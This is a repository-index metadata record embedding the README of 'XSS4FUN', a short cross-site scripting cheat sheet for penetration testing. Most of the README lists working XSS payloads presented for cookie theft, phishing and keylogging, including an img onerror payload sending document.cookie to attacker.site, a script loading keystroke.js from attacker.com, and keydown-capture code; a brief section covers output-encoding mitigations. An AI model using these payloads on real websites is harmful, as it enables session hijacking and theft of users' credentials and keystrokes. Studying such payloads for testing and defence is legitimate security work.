{"id":19350020,"url":"https://github.com/p1ngul1n0/xss4fun","last_synced_at":"2026-04-02T01:47:53.413Z","repository":{"id":114763056,"uuid":"246896942","full_name":"p1ngul1n0/XSS4FUN","owner":"p1ngul1n0","description":"XSS payloads just for fun.","archived":false,"fork":false,"pushed_at":"2021-04-25T01:29:42.000Z","size":34,"stargazers_count":6,"open_issues_count":0,"forks_count":2,"subscribers_count":0,"default_branch":"master","last_synced_at":"2025-10-24T15:57:08.895Z","etag":null,"topics":["cross-site-scripting","pentest","pentesting","web","xss"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/p1ngul1n0.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-03-12T17:47:47.000Z","updated_at":"2025-04-03T19:50:46.000Z","dependencies_parsed_at":"2023-04-08T21:01:06.332Z","dependency_job_id":null,"html_url":"https://github.com/p1ngul1n0/XSS4FUN","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/p1ngul1n0/XSS4FUN","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/p1ngul1n0%2FXSS4FUN","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/p1ngul1n0%2FXSS4FUN/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/p1ngul1n0%2FXSS4FUN/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/p1ngul1n0%2FXSS4FUN/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/p1ngul1n0","download_url":"https://codeload.github.com/p1ngul1n0/XSS4FUN/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/p1ngul1n0%2FXSS4FUN/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":31294159,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-02T01:43:37.129Z","status":"ssl_error","status_checked_at":"2026-04-02T01:43:36.474Z","response_time":53,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cross-site-scripting","pentest","pentesting","web","xss"],"created_at":"2024-11-10T04:29:12.860Z","updated_at":"2026-04-02T01:47:53.395Z","avatar_url":"https://github.com/p1ngul1n0.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# XSS4FUN :cookie:\nCross-Site-Scripting just for fun.\n\n## Cross-Site-Scripting Utils:\n  - Steal cookies for session hijacking.\n  - Modify Webpage to perform phishing.\n  - Inject malicious code.\n## Basic payloads:\n  - \u003cscript\u003ealert(1)\u003c/script\u003e\n\n## Useful payloads:\n  - **\u003cscript src=https://attacker.com/keystroke.js \u003e \u003c/script\u003e**\n    - To include malicious javascript code in page.\n  - **\\\u003cimg src=anything onerror=alert(1) \u003e**\n    - When the **\u003cscript\u003e** is being filtered by the Web Application, you can use javascript events.\n  - **\u003cscript\u003ealert(localStorage.getItem('salary'))\u003c/script\u003e**\n    - To collect sensitive information stored in Browser Local Storage.\n  - **\u003cimg src=error onerror=this.src='http://attacker.site/collector.php?data='+document.cookie \u003e**\n    - This payload starts a loop, so the browser start sending multiple requests to the attacker server with the cookie.\n\n## Javascript useful codes:\n  - To perform HTTP GET request\n  ```\n  var xhttp = new XMLHttpRequest(); //Init xhttp object\n  xhttp.open(\"GET\", \"https://attacker.site/strokes.php?data=data, true); //GET request\n  xhttp.send(); //Send request\n  ```\n  - Collect pressed key\n  ```\n  document.addEventListener(\"keydown\",function(e){\n  pressed_key = e.key;\n  }\n  ```\n## Mitigations    \n  ## PHP\n   Using **htmlspecialchars** to convert special characters to HTML.\n  ```\n  $word = htmlspecialchars($_GET['word']);\n  ```\n  ## ASP NET\n   Using **HtmlEncode** to convert special characters to HTML.\n  ```\n user_input = System.Web.HttpUtility.HtmlEncode(user_input);\n  ```\n  So this **\u003cscript\u003ealert(1)\u003c/script\u003e** becomes this **\\\u0026lt;script\\\u0026gt;alert(1)\\\u0026lt;/script\u0026gt**\n\n## Automated Detection\n  ## xss4fun.py\n  Using selenium to find input fields and inject payloads, if the injection is sucessful, a printscreen is made.\n  \n## References\n - ASP NET Server.HTMLEncode https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525347%28v%3dvs.90%29\n - PHP html specialchars https://www.php.net/manual/en/function.htmlspecialchars.php\n  \n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fp1ngul1n0%2Fxss4fun","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fp1ngul1n0%2Fxss4fun","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fp1ngul1n0%2Fxss4fun/lists"}